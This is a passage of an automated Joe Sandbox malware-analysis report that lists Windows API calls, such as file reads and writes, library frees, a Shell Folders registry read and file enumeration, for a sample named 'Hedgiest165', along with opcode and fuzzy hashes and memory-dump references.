                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$FileModuleName
                                                                        • String ID:
                                                                        • API String ID: 3859505661-0
                                                                        • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                        • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                        • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                        • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                        • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                        • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                        • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                        APIs
                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                        • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                        • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                        • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                        APIs
                                                                        • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                        • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                        • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                        • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                        • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                        • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                        • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                        • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                        • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                        • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                        APIs
                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                        • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                        • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                        • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                        APIs
                                                                        • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                        • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                        • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                        • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                        APIs
                                                                        • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: EnumNamesResource
                                                                        • String ID:
                                                                        • API String ID: 3334572018-0
                                                                        • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                        • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                        • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                        • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                        APIs
                                                                        • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                        • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                        • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                        • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                        APIs
                                                                        • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: CloseFind
                                                                        • String ID:
                                                                        • API String ID: 1863332320-0
                                                                        • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                        • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                        • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                        • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                        • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                        • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                        • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                        • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                        • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                        • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                        • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                        • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                        • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004095FC
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                          • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                          • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                          • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 3655998216-0
                                                                        • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                        • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                        • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                        • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID:
                                                                        • API String ID: 2221118986-0
                                                                        • Opcode ID: 8f2ff5274ffd311217a780683c67287c8ca4d7fe8e78af50df536f193d31e4fb
                                                                        • Instruction ID: 772a3ada9ff9e3703da0d56f01051310ba426115dad5056ab11d4ce01ef11c47
                                                                        • Opcode Fuzzy Hash: 8f2ff5274ffd311217a780683c67287c8ca4d7fe8e78af50df536f193d31e4fb
                                                                        • Instruction Fuzzy Hash: 8411E071A04205BBD7209B6ADC80AAAF7BAEBC4314F20852FF516D3340DB78E9918A54
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                        • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                                        • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                        • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00445426
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                        • String ID:
                                                                        • API String ID: 1828521557-0
                                                                        • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                        • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                        • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                        • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp
                                                                        • String ID:
                                                                        • API String ID: 2081463915-0
                                                                        • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                        • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                        • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                        • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                        APIs
                                                                          • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateErrorHandleLastRead
                                                                        • String ID:
                                                                        • API String ID: 2136311172-0
                                                                        • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                        • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                        • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                        • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                        APIs
                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@??3@
                                                                        • String ID:
